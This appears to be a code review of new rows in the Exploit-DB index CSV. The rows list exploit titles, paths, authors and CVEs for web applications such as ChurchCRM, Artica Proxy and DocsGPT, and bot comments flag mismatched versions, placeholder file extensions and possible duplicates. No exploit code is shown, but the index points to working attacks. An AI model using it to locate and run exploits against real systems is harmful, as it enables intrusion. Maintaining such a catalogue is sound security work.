48693,exploits/multiple/webapps/48693.go,"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution",2020-07-26,"Patrick Hener",webapps,multiple,,2020-07-26,2020-07-26,0,CVE-2020-15492,,,,,
34408,exploits/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - Cross-Site Request Forgery",2014-08-25,"Rainer Giedat",webapps,multiple,80,2014-08-25,2014-08-25,0,CVE-2014-5335;OSVDB-110269,,,,,
52151,exploits/multiple/webapps/52151.txt,"Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)",2025-04-09,"Andrew Lemon/Red Threat",webapps,multiple,,2025-04-09,2025-04-09,0,CVE-2024-38944,,,,,
14004,exploits/multiple/webapps/14004.txt,"Interscan Web Security 5.0 - Arbitrary File Upload / Privilege Escalation",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65973,,cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf,,,
14001,exploits/multiple/webapps/14001.txt,"Interscan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65774,,cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf,,,
49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,,2020-12-03,2021-01-06,0,CVE-2020-29477,,,,,
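Review bot: `Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)` does not match the file it points to, whose title is `MaxTime Database Editor 1.9 Authentication Bypass` and whose steps reach a configuration form without credentials; `Authentication Bypass` is the accurate class. `1.9.6` appears nowhere in the file, which says `1.9` and `1.9.x`, and `controller` should be capitalised like the rest of the product name.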
@ -12452,6 +12454,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50233,exploits/multiple/webapps/50233.py,"ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"numan türle",webapps,multiple,,2021-08-30,2021-08-30,0,,,,,,
46895,exploits/multiple/webapps/46895.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting",2019-05-22,Vingroup,webapps,multiple,,2019-05-22,2019-05-22,0,CVE-2019-12189,,,http://www.exploit-db.com/screenshots/idlt47000/1.jpg,,
46894,exploits/multiple/webapps/46894.txt,"Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions",2019-05-22,Vingroup,webapps,multiple,,2019-05-22,2019-05-22,0,CVE-2019-12252,,,,,
52148,exploits/multiple/webapps/52148.txt,"Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege",2025-04-09,"Metin Yunus Kandemir",webapps,multiple,,2025-04-09,2025-04-09,0,CVE-2024-24409,,,,,https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
46788,exploits/multiple/webapps/46788.txt,"Zotonic < 0.47.0 mod_admin - Cross-Site Scripting",2019-05-03,"Ramòn Janssen",webapps,multiple,,2019-05-03,2019-05-03,0,CVE-2019-11504,,,,http://www.exploit-db.comzotonic-0.46.0.zip,
22490,exploits/multiple/webapps/22490.txt,"ZPanel 10.0.1 - Cross-Site Request Forgery / Cross-Site Scripting / SQL Injection / Password Reset",2012-11-05,pcsjj,webapps,multiple,,2012-11-05,2012-11-07,1,CVE-2012-5686;CVE-2012-5685;CVE-2012-5684;CVE-2012-5683;OSVDB-87142;OSVDB-87141;OSVDB-87140;OSVDB-87139,,,,http://www.exploit-db.comzpanelx-1_0_0.zip,
35012,exploits/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Cross-Site Scripting",2010-11-23,"Usman Saeed",webapps,multiple,,2010-11-23,2014-10-20,1,,,,,,https://www.securityfocus.com/bid/45027/info
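Review bot: `Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege` names the fixed build: the file says `Build < 7210` throughout and was tested against build 7203, so the description should read `< 7210` (or `7203`) to avoid implying that 7210 is affected. The row stores the external write-up in the source column, which is the same link that makes up the file's whole PoC section.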
@ -14123,6 +14126,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9636,exploits/php/webapps/9636.txt,"An image Gallery 1.0 - 'navigation.php' Local Directory Traversal",2009-09-10,"ThE g0bL!N",webapps,php,,2009-09-09,,1,OSVDB-57945;CVE-2009-3367;OSVDB-57944;CVE-2009-3366;OSVDB-57943,,,,,
5824,exploits/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",webapps,php,,2008-06-14,2016-12-09,1,OSVDB-53697;CVE-2008-6665,,,,http://www.exploit-db.comAnanta10b5.zip,
48832,exploits/php/webapps/48832.txt,"Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)",2020-09-25,"Sinem Şahin",webapps,php,,2020-09-25,2020-09-25,0,,,,,,
52147,exploits/php/webapps/52147.NA,"Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)",2025-04-09,"Ahmet Ümit BAYRAM",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-37732,,,,,
37096,exploits/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",webapps,php,,2012-04-20,2015-05-24,1,,,,,,https://www.securityfocus.com/bid/53181/info
26958,exploits/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Persistent Cross-Site Scripting",2013-07-18,DURAKIBOX,webapps,php,,2013-07-18,2013-07-21,1,OSVDB-95568;CVE-2013-5099,,,,http://www.exploit-db.comanchor-cms-0.9.1.zip,
27138,exploits/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 - 'Comentarios.php' SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-26,2013-07-28,1,CVE-2006-0462;OSVDB-22755,,,,,https://www.securityfocus.com/bid/16393/info
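Review bot: `exploits/php/webapps/52147.NA` has a placeholder extension; the file is a text advisory and the neighbouring row 48832 shows the `.txt` convention. That neighbour is also the same product, version and bug class (`Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)`, 2020), so the new description should say which field differs or the two rows should be cross-referenced; the new row carries CVE-2024-37732 and the old one no CVE, which may be the only real difference.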
@ -14285,6 +14289,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51215,exploits/php/webapps/51215.txt,"Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-28,1,CVE-2023-23162,,,,,
51216,exploits/php/webapps/51216.txt,"Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated",2023-04-03,"Rahul Patwari",webapps,php,,2023-04-03,2023-04-28,1,CVE-2023-23163,,,,,
34560,exploits/php/webapps/34560.html,"ArtGK CMS - Cross-Site Scripting / HTML Injection",2010-09-01,"High-Tech Bridge SA",webapps,php,,2010-09-01,2014-09-08,1,,,,,,https://www.securityfocus.com/bid/42923/info
52146,exploits/php/webapps/52146.py,"Artica Proxy 4.50 - Remote Code Execution (RCE)",2025-04-09,Madan,webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-2054,,,,,
43206,exploits/php/webapps/43206.txt,"Artica Web Proxy 3.06 - Remote Code Execution",2017-12-01,hyp3rlinx,webapps,php,,2017-12-01,2017-12-01,0,CVE-2017-17055,,,,,
31028,exploits/php/webapps/31028.txt,"Article Dashboard - '/admin/login.php' Multiple SQL Injections",2008-01-15,Xcross87,webapps,php,,2008-01-15,2014-01-19,1,CVE-2008-0286;OSVDB-40273,,,,,https://www.securityfocus.com/bid/27286/info
4221,exploits/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,webapps,php,,2007-07-23,,1,OSVDB-39107;CVE-2007-4007,,,,,
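Review bot: the description `Artica Proxy 4.50` drops 4.40, which the file's Version line lists as affected, and the file's own title carries the root cause (`insecure deserialization`); `Artica Proxy 4.40 / 4.50 - Insecure Deserialization (RCE)` would match the file. The `.py` extension is correct, but as noted on the file the script does not parse as committed, so the row should not be published until that is fixed.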
@ -15788,6 +15793,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,,2021-07-09,2021-07-09,0,,,,,,
50965,exploits/php/webapps/50965.txt,"ChurchCRM 4.4.5 - SQLi",2022-06-14,nu11secur1ty,webapps,php,,2022-06-14,2022-06-14,0,CVE-2022-31325,,,,,
51319,exploits/php/webapps/51319.py,"ChurchCRM 4.5.1 - Authenticated SQL Injection",2023-04-07,Arvandy,webapps,php,,2023-04-07,2023-04-07,0,CVE-2023-24787,,,,,
52152,exploits/php/webapps/52152.NA,"ChurchCRM 5.9.1 - SQL Injection",2025-04-09,"Sanan Qasimzada",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-39304,,,,,
51296,exploits/php/webapps/51296.txt,"ChurchCRM v4.5.3-121fcc1 - SQL Injection",2023-04-06,nu11secur1ty,webapps,php,,2023-04-06,2023-04-06,0,,,,,,
51477,exploits/php/webapps/51477.txt,"ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)",2023-05-23,"Rahad Chowdhury",webapps,php,,2023-05-23,2023-05-23,0,CVE-2023-31699,,,,,
15887,exploits/php/webapps/15887.txt,"ChurchInfo 1.2.12 - SQL Injection",2011-01-01,dun,webapps,php,,2011-01-01,2011-01-01,1,OSVDB-70253,,,,http://www.exploit-db.comchurchinfo-1.2.12.zip,
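Review bot: `52152.NA` again has a placeholder extension, and the row's version (`5.9.1`) and CVE (`CVE-2024-39304`) are absent from the file, whose header is `ChurchCRM v4.5.3-121fcc1`, the same string as the existing row 51296 directly below; confirm that this is a distinct finding against 5.9.1 before publishing, otherwise it duplicates 51296 under a new author.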
@ -28677,6 +28683,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8095,exploits/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,webapps,php,,2009-02-22,,1,,,,,,
29632,exploits/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",webapps,php,,2007-02-22,2017-02-14,1,CVE-2007-1152;OSVDB-37398,,,,,https://www.securityfocus.com/bid/22667/info
26018,exploits/php/webapps/26018.txt,"Pyrox Search 1.0.5 - 'Newsearch.php' Whatdoreplace Cross-Site Scripting",2005-07-21,rgod,webapps,php,,2005-07-21,2013-06-08,1,,,,,,https://www.securityfocus.com/bid/14343/info
52153,exploits/php/webapps/52153.NA,"PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)",2025-04-09,"Vuln Seeker Cybersecurity Team",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-6244,,,,,
8031,exploits/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,webapps,php,,2009-02-09,2017-02-08,1,,,,,,
26600,exploits/php/webapps/26600.txt,"Q-News 2.0 - Remote File Inclusion",2005-11-26,[GB],webapps,php,,2005-11-26,2013-07-05,1,CVE-2005-3859;OSVDB-21137,,,,,https://www.securityfocus.com/bid/15576/info
16116,exploits/php/webapps/16116.txt,"Qcodo Development Framework 0.3.3 - Full Information Disclosure",2011-02-05,"Daniel Godoy",webapps,php,,2011-02-05,2011-02-05,1,,,,,,
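Review bot: `52153.NA` has a placeholder extension; the PoC is a text file carrying an HTML snippet, so `.txt` or `.html` (as 49351 above) fits. The description could name the action (`change user profile picture`, from the file title) so the row is distinguishable from other CSRF entries for the same plugin.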
@ -29037,6 +29044,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52133,exploits/php/webapps/52133.txt,"Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)",2025-04-06,"Ilteris Kaan Pehlivan",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-9458,,,,,
43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,,2018-01-17,2018-01-17,0,CVE-2018-5705,,,,,
48627,exploits/php/webapps/48627.txt,"Reside Property Management 3.0 - 'profile' SQL Injection",2020-06-30,"Behzad Khalifeh",webapps,php,,2020-06-30,2020-06-30,0,,,,,,
52150,exploits/php/webapps/52150.NA,"ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)",2025-04-09,"Jeremia Geraldi Sihombing",webapps,php,,2025-04-09,2025-04-09,0,CVE-2024-39143,,,,,
35541,exploits/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",webapps,php,,2014-12-15,2014-12-15,0,OSVDB-115821;OSVDB-115820;OSVDB-115819;OSVDB-115818,,,,,
46274,exploits/php/webapps/46274.txt,"ResourceSpace 8.6 - 'collection_edit.php' SQL Injection",2019-01-28,dd_,webapps,php,80,2019-01-28,2019-01-28,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comResourceSpace_8_6_12117.zip,
46308,exploits/php/webapps/46308.txt,"ResourceSpace 8.6 - 'watched_searches.php' SQL Injection",2019-02-04,dd_,webapps,php,80,2019-02-04,2019-02-05,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comResourceSpace_8_6_12117.zip,
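Review bot: `52150.NA` has a placeholder extension; the file is a plain-text advisory, so `.txt`. The file's header says `<= 2.10.1`, which the description compresses to `2.10.1` in line with house style, but carrying `via Content Form` from the file title into the description would make the affected parameter findable from the CSV.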
@ -35043,6 +35051,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,,
51992,exploits/python/webapps/51992.py,"djangorestframework-simplejwt 5.3.1 - Information Disclosure",2024-04-15,"Dhrumil Mistry",webapps,python,,2024-04-15,2024-04-15,0,CVE-2024-22513,,,,,
52145,exploits/python/webapps/52145.py,"DocsGPT 0.12.0 - Remote Code Execution",2025-04-09,"Shreyas Malhotra",webapps,python,,2025-04-09,2025-04-09,1,CVE-2025-0868,,,,,
51580,exploits/python/webapps/51580.txt,"Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)",2023-07-11,"Sander Ferdinand",webapps,python,,2023-07-11,2023-07-11,0,,,,,,
49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
52076,exploits/python/webapps/52076.py,"Invesalius3 - Remote Code Execution",2024-08-28,"Alessio Romano (sfoffo)_ Riccardo Degli Esposti (partywave)",webapps,python,,2024-08-28,2024-08-28,0,,,,,,
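Review bot: this row sets the verified column to 1 while every other row in this commit has 0; given that the script only issues `touch /tmp/test` and prints the status code, record how success was observed against a 0.12.0 instance. The description `DocsGPT 0.12.0` also drops the `0.8.1 through 0.12.0` range the file states.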
